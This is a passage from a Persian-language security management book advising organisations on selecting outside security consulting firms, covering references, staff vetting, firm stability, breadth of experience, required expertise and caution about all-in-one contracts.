ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﻣﻮﺍﺭﺩ ﻓـﻮﻕ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺑﺪﺍﻧﻴـﺪ
ﻧﻴﺎﺯﻫﺎﻳﺘﺎﻥ ﭼﻴﺴﺖ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺁﻥ ﺧﺪﻣﺎﺕ ﺑﻪ ﻛﺪﺍﻡ ﻧﻴﺎﺯﻫﺎﻳﺘـﺎﻥ
ﭘﺎﺳﺦ ﻣﻲﺩﻫﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻫﻤﻴـﺸﻪ ﺳـﺎﺩﻩ ﻧﻴـﺴﺖ ،ﭼﺮﺍﻛـﻪ ﺗـﺎ
ﻭﻗﺘﻲ ﺗﺠﺮﺑﺔ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ ﻭ ﻣﺤﻴﻂ ﺍﻃﺮﺍﻑ ﺧﻮﺩ
ﺭﺍ ﺧﻮﺏ ﻧﺸﻨﺎﺧﺘﻪ ﺑﺎﺷﻴﺪ ،ﻧﻴﺎﺯﻫﺎﻱ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺭﺍ ﻧﻤﻲﺩﺍﻧﻴﺪ.
ﺍﻧﺘﺨﺎﺏ ﻓﺮﻭﺷﻨﺪﻩ
ﻣﻮﻓﻘﻴﺖ ﺷﻤﺎ ﺩﺭ ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻮﺭ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺛﺎﻟﺚ ﺗـﺎ
ﺣﺪ ﺯﻳﺎﺩﻱ ﺑﻪ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻳﺎ ﺍﻓﺮﺍﺩﻱ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑـﺮﺍﻱ
ﺍﻳﻨﻜﺎﺭ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩﺍﻳﺪ.
ﻳﻚ ﺭﺍﻫﻨﻤﺎ ﺑﮕﻴﺮﻳﺪ ﻭ ﺭﻭﻱ ﻣﻌﺮﻓﻬﺎ ﭘﺎﻓﺸﺎﺭﻱ ﻛﻨﻴﺪ
ﺑﻪ ﻋﻠﺖ ﺗﻨﻮﻉ ﺯﻳﺎﺩ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ ،ﻳﻜﻲ ﺍﺯ ﺑﻬﺘﺮﻳﻦ ﺭﻭﺷﻬﺎﻱ
ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﻧﻈﺮﺗﺎﻥ ،ﭘﺮﺳﻴﺪﻥ ﺍﺯ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺁﺷـﻨﺎ ﻭ
ﻣﺸﺎﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩﺗﺎﻥ ﻣﻲ ﺑﺎﺷﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻴﺸﻪ ﭘﻴﺪﺍ ﻛـﺮﺩﻥ
ﻳﻚ ﻣﻌﺮﻑ ﺧﻮﺏ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴـﺴﺖ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎ ،ﻳـﺎ
ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ ﺍﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻧﻤﺎﻳـﺸﮕﺎﻩ ﺗﺠـﺎﺭﻱ ﭘﻴـﺪﺍ
102 Remote Monitoring and Response Firm
ﻛﺮﺩﻩﺍﻧـﺪ ،ﻳـﺎ ﺍﻭﻟـﻴﻦ ﺑـﺎﺭ ﺩﺭ ﻣﻘـﺎﻻﺕ ﺧﺒـﺮﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻣﻄـﺎﻟﺒﻲ
ﺧﻮﺍﻧﺪﻩﺍﻧﺪ ،ﻭ ﻳﺎ ﭘﺲ ﺍﺯ ﻳﻚ ﺗﻤﺎﺱ ﺳﺎﺩﺓ ﺗﻠﻔﻨﻲ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ
ﻭﺍﺳﻄﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺪﻣﺎﺕ ﺁﻧﺎﻥ ﮔﺮﻓﺘﻪﺍﻧﺪ.
ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺷﺮﻛﺖ ﺛﺎﻟﺚ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺟﺎﻳﮕـﺎﻫﻲ ﻗـﺮﺍﺭ
ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺳـﻨﮕﻴﻨﻲ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﻭﺍﺭﺩ
ﺁﻭﺭﺩ .ﺣﺘﻲ ﺍﮔﺮ ﻳﻚ ﺷﺮﻛﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﻴﺮﻭﻧﻲ ﺑﺴﻴﺎﺭ ﺍﻣﺎﻧﺘﺪﺍﺭ
ﻭ ﺷﺎﻳﺴﺘﻪ ﺑﺎﺷﺪ ،ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺩﺭ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻱ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﻋﺘﻤـﺎﺩ
ﻛﻨﻴﺪ ﻭ ﺁﻥ ﻛﺎﺭ ﺑﺼﻮﺭﺕ ﻧﺎﻣﻄﻠﻮﺏ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗـﺎ
ﻣﺎﻫﻬﺎ ﺑﻌﺪ ﻛﻪ ﭘﻴﺎﻣـﺪﻫﺎﻱ ﺁﻥ ﺁﺷـﻜﺎﺭ ﺷـﻮﻧﺪ -ﺯﻣﺎﻧﻴﻜـﻪ ﺷـﺎﻳﺪ
ﺭﺍﺑﻄﺔ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﺷﺮﻛﺖ ﭘﺎﻳﺎﻥ ﻳﺎﻓﺘﻪ ﺑﺎﺷﺪ -ﻣﺘﻮﺟﻪ ﺁﻥ ﺍﺷـﻜﺎﻝ
ﻧﺸﻮﻳﺪ.
ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻭﻗﺘﻲ ﻳﻚ ﺷـﺮﻛﺖ ﺭﺍ ﺑـﺮﺍﻱ ﻫﻤﻜـﺎﺭﻱ ﺩﺭﻧﻈـﺮ
ﻣﻲﮔﻴﺮﻳﺪ ﺑﺎﻳﺪ:
ﻣﻌﺮﻓﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ
ﺑﺪﻧﺒﺎﻝ ﻣﻌﺮﻓﻬﺎﻱ ﺣﺮﻓﻪﺍﻱ ﺑﮕﺮﺩﻳﺪ ﻛﻪ ﺷـﺨﺺ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻲ ﺭﺍ
ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺧﺪﻣﺎﺗﻲ ﻣﺸﺎﺑﻪ ﺁﻧﭽﻪ ﺷﻤﺎ ﺑﺪﻧﺒﺎﻝ ﺁﻥ ﻫـﺴﺘﻴﺪ
ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ.
ﺍﻓﺮﺍﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ
ﺍﮔﺮ ﺍﻓﺮﺍﺩ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﺗﺎﻥ ﺑﻪ ﺷﻤﺎ ﻣﻌﺮﻓﻲ ﺷﺪﻩﺍﻧﺪ ،ﺑـﺎ
ﺭﻭﺷﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤﻴﻦ ﻣﺒﺤﺚ ﻭ ﺩﺭ ﺑﺨﺶ "ﺍﻓـﺮﺍﺩ" ﺷـﺮﺡ
ﻣﻲ ﺩﻫﻴﻢ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻛﻨﻴـﺪ .ﺩﺭ ﻣـﻮﺭﺩ ﺷـﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ
ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺍﺳﺎﻣﻲ ﺍﻓﺮﺍﺩ ﺩﺭﮔﻴﺮ ﺩﺭ ﭘﺮﻭﮊﺓ ﺷﻤﺎ ﺭﺍ ﺗﺎ ﭘﺮﺩﺍﺧـﺖ
ﻗﺴﻂ ﺍﻭﻝ ﻫﺰﻳﻨﺔ ﻗﺮﺍﺭﺩﺍﺩ ﺩﺭ ﺍﺧﺘﻴﺎﺭﺗﺎﻥ ﻗﺮﺍﺭ ﻧﻤﻲﺩﻫﻨﺪ ﻣﺤﺘﺎﻃﺎﻧﻪ
ﻋﻤﻞ ﻛﻨﻴﺪ.
ﭘﺎﻳﺪﺍﺭﻱ ﻭ ﺗﺪﺍﻡ ﻓﻌﺎﻟﻴﺖ ﺷﺮﻛﺖ ﺭﺍ ﺩﺭ ﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ
ﺍﮔﺮ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﭘﺮﻭﮊﺓ ﺑﻠﻨﺪﻣﺪﺕ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺴﺘﻪﺍﻳﺪ ﺑﺎﻳـﺪ
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺷﺮﻛﺖ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺩﺭ ﺗﻤﺎﻡ ﻣـﺪﺕ
ﻝ ﻗﺮﺍﺭﺩﺍﺩ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷـﺖ .ﻣﻨﻈـﻮﺭ ﺍﺯ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺍﻳـﻦ
ﻃﻮ ﹺ
ﻧﻴــﺴﺖ ﻛــﻪ ﺷــﻤﺎ ﻧﺒﺎﻳــﺪ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺧــﺪﻣﺎﺕ ﺷــﺮﻛﺘﻬﺎﻱ
ﺗﺎﺯﻩﺗﺄﺳﻴﺲ ﻣﻮﺍﻓﻘﺖ ﻛﻨﻴﺪ ،ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ
ﻣﺮﺑﻮﻃـﻪ ﻭﺍﺟــﺪ ﻣــﺪﻳﺮﻳﺖ ﻭ ﭘـﺸﺘﻮﺍﻧﺔ ﻣــﺎﻟﻲ ﻻﺯﻡ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ
ﺗﻌﻬﺪﺍﺗﺶ ﻣﻲﺑﺎﺷﺪ .ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﻧﺮﺧﻬﺎﻱ
ﭘﺎﺋﻴﻦ ﻫﺴﺘﻨﺪ ﺍﺟﺘﻨـﺎﺏ ﻛﻨﻴـﺪ؛ ﭼﺮﺍﻛـﻪ ﺍﮔـﺮ ﻧﺘﻮﺍﻧﻨـﺪ ﺑـﺎ ﻓـﺮﻭﺵ
ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺷﻤﺎ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺧﺮﻳﺪ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺗـﺄﻣﻴﻦ
ﻛﻨﻨﺪ ،ﺁﻧﮕﺎﻩ ﺳﻌﻲ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ ﺍﺯ ﺟﺎﻱ ﺩﻳﮕﺮ ﺍﻳﻦ ﭘﻮﻝ ﺭﺍ ﺑﺪﺳﺖ
١٦٩
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺁﻭﺭﻧﺪ ﻭ ﻟﺬﺍ ﺧﺪﻣﺎﺕ ﻫﺮﭼﻨﺪ ﺳﻄﺢ ﺑﺎﻻﻱ ﺁﻧﻬﺎ ﺩﺭ ﺟـﺎﻱ ﺩﻳﮕـﺮ ﻭ
ﺷﺎﻳﺪ ﺣﺘﻲ ﺗﺠﺎﺭﺕ ﺩﻳﮕﺮﻱ ﻣﺘﻤﺮﻛﺰ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﮔﺴﺘﺮﺩﮔﻲ ﺗﺠﺎﺭﺏ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ
ﺷﻤﺎ ﺑﺎﻳﺪ ﺣﺘﻲﺍﻻﻣﻜﺎﻥ ﺍﺯ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻋﻤﺪﺓ ﺗﺠﺮﺑـﻪ
ﺁﻧﻬﺎ ﻣﺮﺑﻮﻁ ﻳﻚ ﻧﻮﻉ ﻣﺸﺘﺮﻱ ﻳﺎ ﻳﻚ ﺑﺴﺘﺮ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ
ﺍﺳﺖ ﻣﺤﺘﺎﻃﺎﻧﻪ ﻋﻤﻞ ﻛﻨﻴﺪ ،ﻣﮕﺮ ﺁﻧﻜﻪ ﻧﻴﺎﺯﻫـﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ
ﺩﻗﻴﻘﹰﺎ ﺑﺎ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺷﺮﻛﺖ ﻣﺰﺑﻮﺭ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ
ﻣﻲﺩﻫﺪ ﻣﻄﺎﺑﻘـﺖ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﻳـﻚ ﺷـﺮﻛﺖ
ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺍﺳﺎﺳﹰﺎ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺷﺨﺺ ﺛﺎﻟﺚ ﺭﺍ ﺑﻪ ﺍﺩﺍﺭﺍﺕ
ﭘﻠﻴﺲ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺳﻴـﺴﺘﻢ Microsoft Windows
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﻳﻚ ﺷـﺮﻛﺖ ﺩﺍﺭﻭﻳـﻲ ﻛـﻪ
ﺗﺮﻛﻴﺒــﻲ ﺍﺯ Windowsﻭ Unixﺭﺍ ﺑﻜــﺎﺭ ﮔﺮﻓﺘــﻪ ﺍﻧﺘﺨــﺎﺏ
ﻣﻨﺎﺳﺒﻲ ﻧﺒﺎﺷﺪ .ﮔﺴﺘﺮﺓ ﺗﺠﺎﺭﺏ ﺷﺮﻛﺖ ﻣﺸﺎﻭﺭﻩﺍﻱ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺁﻧﻘﺪﺭ ﻓﺮﺍﮔﻴﺮ ﻧﺒﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺧﺪﻣﺎﺕ ﺳﻴﺎﺳﺘﻲ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ
ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺤﻴﻂ ﻛﺎﺭﻱ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﺩﻫﺪ .ﺍﻳﻦ ﻧﻜﺘﻪ
ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﻧﻴﺴﺖ ﻛﻪ ﺍﻓﺮﺍﺩ ﺑﺎ ﺳـﻮﺍﺑﻖ ﻛـﺎﺭﻱ ﺩﺭ ﻳـﻚ ﺣـﻮﺯﺓ
ﺧﺎﺹ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺩﻭﺭﻧﻤﺎﻱ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺷﻤﺎ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ؛ ﺍﻣـﺎ
ﺷﻤﺎ ﺑﺎﻳﺪ ﻣﺤﺘﺎﻁ ﺑﺎﺷﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺷـﻮﺍﻫﺪ ﺭﻭﺷـﻨﻲ ﺑـﺮﺍﻱ
ﺗﺄﻳﻴﺪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ.
ﻛﺎﺭﻛﻨﺎﻥ ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﺣﺪﺍﻗﻞ ﺑﺎﻳﺪ ﺑﺎ ﻣﺴﺎﺋﻞ ﺯﻳﺮ ﺁﺷﻨﺎﻳﻲ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻨﺪ:
103 “All in One” Contracts
•
ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻠﻲ ﻭ ﻣﺤﻠﻲ؛
•
ﻣﺤﺼﻮﻻﺕ ،ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ؛
•
ﻭﻳﺮﻭﺳﻬﺎ ،ﻛﺮﻣﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺳﺎﻳﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨـﺮﺏ،
ﻭ ﻫﻤﭽﻨﻴﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﻮﻳﻨﺪﻩ١٠٤؛
•
ﻲ ﻣﺠــﺎﺯﻱ
ﺍﺻــﻮﻝ TCP/IPﺩﺭ ﺷــﺒﻜﻪﻫــﺎﻱ ﺧــﺼﻮﺻ ﹺ
)(VPNs
١٠٥
ﻭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ؛
•
ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ ،ﺭﺍﻫﻨﻤﺎﻫﺎ ﻭ ﺧﺪﻣﺎﺕ؛
•
ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎ ﻭ ﭘﻴﮕﺮﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ؛
•
ﺍﻣﻨﻴﺖ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛ ﻭ
ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ،ﺭﻭﺷﻬﺎﻱ ﺭﺳﻤﻲ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ،ﻭ
ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻮﺭ ﺑﻴﻤﻪ.
•
ﻫﺮ ﺷﺮﻛﺖ ﺧﺪﻣﺎﺕ ﻣﺸﺎﻭﺭﻩ ﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺧـﻮﺑﻲ
ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺗﻬﻴﻪ ﻛﻨﺪ ﺑﺎﻳﺪ ﭘﺮﺳـﻨﻠﻲ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﺪ ﻛﻪ ﻃﺎﻟﺐ ﮔﻔﺘﮕﻮ ﺩﺭﺑﺎﺭﺓ ﻣﺒﺎﺣﺚ ﻣﺨﺘﻠﻒ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ
ﻭ ﺑﻮﻳﮋﻩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻥ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﺑﺎﺷﻨﺪ .ﺍﮔﺮ ﺁﻧﻬﺎ ﺁﻣﺎﺩﻩ ﻭ
ﻳﺎ ﻗﺎﺩﺭ ﺑﻪ ﺑﺤﺚ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳـﻦ ﻋﻨـﺎﻭﻳﻦ ﻧﺒﺎﺷـﻨﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺍﻧﺘﺨﺎﺏ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻧﺒﺎﺷﻨﺪ.
ﺍﮔﺮ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﻧﮕﺮﺍﻧﻲ ﺧﺎﺻﻲ ﺩﺍﺭﻳﺪ ﻛﺎﻓﻴﺴﺖ ﺍﺯ ﺁﻧﻬﺎ
ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻳﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﻳﻚ ﻣﺸﺘﺮﻱ ﺩﻳﮕـﺮ
ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ .ﺑﺮﺧـﻲ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ
ﭼﻨﻴﻦ ﺳﻨﺪﻱ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺣﺬﻑ ﺍﺳﻢ ﻭ ﻣﺸﺨﺼﺎﺕ ﻣﺸﺘﺮﻱ ﺑﻪ ﺷﻤﺎ
ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ .ﺳﺎﻳﺮ ﺷﺮﻛﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﺸﺘﺮﻳﻬﺎﻳﻲ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻨﺪ ﻛﻪ ﺧﻮﺩﺷﺎﻥ ﺧﻮﺍﺳﺘﻪ ﺑﺎﺷﻨﺪ ﺩﺭ ﻓﻬﺮﺳﺖ "ﻣﺸﺘﺮﻳﺎﻥ ﻣﺮﺟﻊ"
ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﺑﻌﻀﻲ ﺷـﺮﻛﺘﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﭘـﻴﺶ ﺍﺯ ﺍﺭﺍﺋـﻪ ﻫـﺮ
ﺍﻃﻼﻋـــﺎﺗﻲ ﺍﺯ ﺷـــﻤﺎ ﺑﺨﻮﺍﻫﻨـــﺪ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـــﻪﺍﻱ ﺩﺍﻝ ﺑـــﺮ
ﺳﺮﻱ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﺳﻨﺎﺩ ﺍﻣﻀﺎ ﻛﻨﻴﺪ .ﺍﺯ ﺧﺪﻣﺎﺕ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ
ﺍﺳﻢ ﻭ ﺍﺳﻨﺎﺩ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﺪﻭﻥ ﻣﺠﻮﺯ ﺁﻧﻬﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻭ
ﺩﻳﮕﺮﺍﻥ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ؛ ﭼﻮﻥ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺷﻤﺎ ﻧﻴﺰ ﺑﺪﻭﻥ ﻣﺠـﻮﺯ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﻌـﺪﻱ
ﺧﻮﺩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ .ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺍﮔﺮ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺧـﺎﺭﺝ
104 Scanning Software
105 Virtual Private Networks
ﺑﺨﺶ ﺳﻮﻡ
ﻣﺮﺍﻗﺐ ﻓﺮﻳﺒﻜﺎﺭﻳﻬﺎ ﺑﺎﺷﻴﺪ
ﺩﺭ ﻣﻮﺭﺩ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻫﻤﻪﺟﺎﻧﺒﻪ ﻛﻪ ﺩﺭ ﺁﻥ ﻳـﻚ ﺷـﺮﻛﺖ ﺑـﻪ
ﺗﻨﻬﺎﻳﻲ ﻫﻤـﺔ ﺳﻴﺎﺳـﺘﻬﺎ ﺭﺍ ﺗﻬﻴـﻪ ﻧﻤـﻮﺩﻩ ﻭ ﺑـﺮﺍﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﺳﻴﺎﺳﺘﻬﺎ ،ﺧﺪﻣﺎﺕ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻻﺯﻡ ﺭﺍ ﻧﻴﺰ ﻣﻲﻓﺮﻭﺷـﺪ ﻣﺮﺍﻗـﺐ
ﺑﺎﺷﻴﺪ .ﻣﺎ ﮔﺰﺍﺭﺷـﺎﺗﻲ ﺩﺭﻳﺎﻓـﺖ ﻛـﺮﺩﻩﺍﻳـﻢ ﻛـﻪ ﺩﺭ ﺁﻥ ﻧﻴﺎﺯﻫـﺎﻱ
ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﻭ ﻧﻴﺎﺯﻫﺎﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻃﺮﺯ ﻣﺸﻜﻮﻛﻲ ﺑﺮﺍﻱ
ﻫﻤﺔ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﺴﻴﺎﺭ ﻣـﺸﺎﺑﻪ ﻳﻜـﺪﻳﮕﺮ ﺑـﻮﺩﻩ ﻭ ﺩﺭ ﻫﻤﮕـﻲ ﺍﺯ
ﻱ ﻧﺴﺒﺘﹰﺎ ﻣﺸﺎﺑﻬﻲ ﺍﺳﺘﻔﺎﺩﻩ
ﺳﺨﺖ ﺍﻓﺰﺍﺭ ﭘﺎﻳﻪ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣﺸﺎﻭﺭﻩﺍ ﹺ
ﺷﺪﻩ ﺑﻮﺩ .ﺍﮔﺮ ﺷﻤﺎ ﺷﺮﻛﺘﻲ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﺷﻤﺎ ﺭﺍ ﻣﺤـﺪﻭﺩ
ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﺍﻧﺤﺼﺎﺭﻱ ﺑﻠﻨﺪﻣـﺪﺕ ﺑـﺎ ﺧـﻮﺩ ﻧﻜﻨـﺪ ،ﺁﻧﮕـﺎﻩ ﺍﺣﺘﻤـﺎﻝ
